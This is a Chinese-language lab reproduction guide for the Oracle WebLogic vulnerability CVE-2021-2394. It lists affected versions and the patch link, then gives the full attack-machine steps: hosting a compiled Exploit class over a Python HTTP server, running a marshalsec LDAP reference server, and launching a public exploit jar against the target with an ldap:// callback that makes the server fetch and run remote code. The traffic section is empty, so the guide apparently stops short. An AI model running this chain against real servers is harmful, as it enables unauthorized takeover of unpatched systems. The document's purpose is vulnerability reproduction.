CVE-2021-2394
一、简介
oracle公司在2021年7月重要补丁更新报告中,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。
二、复现环境:
平台:
Code
1 | windows 10 |
工具:
Code
1 | jdk8 (注意,安装目录不可有空格) |
三、受影响版本
Code
1 | Oracle WebLogic Server 10.3.6.0.0 |
四、修复方式
官方已发布补丁。
官方下载链接:https://www.oracle.com/security-alerts/cpuapr2021.html
五、复现过程
1、安装
Code
1 | java -jar fmw_12.2.1.3.0_wls.jar |
安装过程如环境搭建文档,下载weblogic 12.2.1.3.0并安装
**2、[攻击机]**创建Exploit.java,通过javac编译得到Exploit.class
cmd
1 | javac Exploit.java // 编译 |
java
1 | //Exploit.class |
**3、[攻击机]**jar目录下 使用python开启一个http服务,并使用marshalsec开启JNDI服务
下载marshalsec工具
https://github.com/mbechler/marshalsec
编译
Code
1 | mvn clean package -DskipTests |
4、开启PYTHON服务【marshalsec.jar目录下】
Code
1 | python -m http.server 8000 |
开启JNDI服务【marshalsec.jar目录下】
Code
1 | java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.24.129:8000/#Exploit" 8087 |
5、[攻击机]下载EXP
https://github.com/lz2y/CVE-2021-2394/releases/tag/2.0
运行【一条命令】
Code
1 | java -jar CVE_2021_2394.jar 192.168.24.132 7001 ldap://192.168.24.129:8087/Exploit |
攻击成功
六、流量
第一条流量